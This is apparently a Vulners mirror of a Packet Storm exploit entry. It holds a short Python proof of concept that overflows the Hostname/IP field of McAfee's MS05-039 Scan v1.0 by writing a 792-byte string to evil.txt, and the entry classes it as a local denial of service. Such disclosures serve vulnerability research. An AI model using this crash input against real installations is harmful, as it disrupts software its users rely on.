Lucene search
K

MS05-039 Scan 1.0 Buffer Overflow

🗓️ 18 Aug 2017 00:00:00Reported by Anurag SrivastavaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

MS05-039 Scan v1.0 Hostname/IP Field Local Buffer Overflow Exploi

Code
`#!/usr/bin/python  
  
# Exploit Title : MS05-039 Scan v1.0 Hostname/IP Field Local BoF PoC  
# Discovery by : Anurag Srivastava  
# Email : [email protected]  
# Discovery Date : 18/08/2017  
# Software Link : https://www.mcafee.com/in/downloads/free-tools/ms05-039-scan.aspx  
# Tested Version : 1.0  
# Vulnerability Type : Denial of Service (DoS) Local  
# Tested on OS : Windows 10 Home x64  
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->  
##########################################################################################  
# -----------------------------------NOTES----------------------------------------------#  
##########################################################################################  
  
  
  
buffer = "A"*788  
eip = "B"*4  
f = open("evil.txt", "wb")  
f.write(buffer+eip)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2017 00:00Current
0.8Low risk
Vulners AI Score0.8
22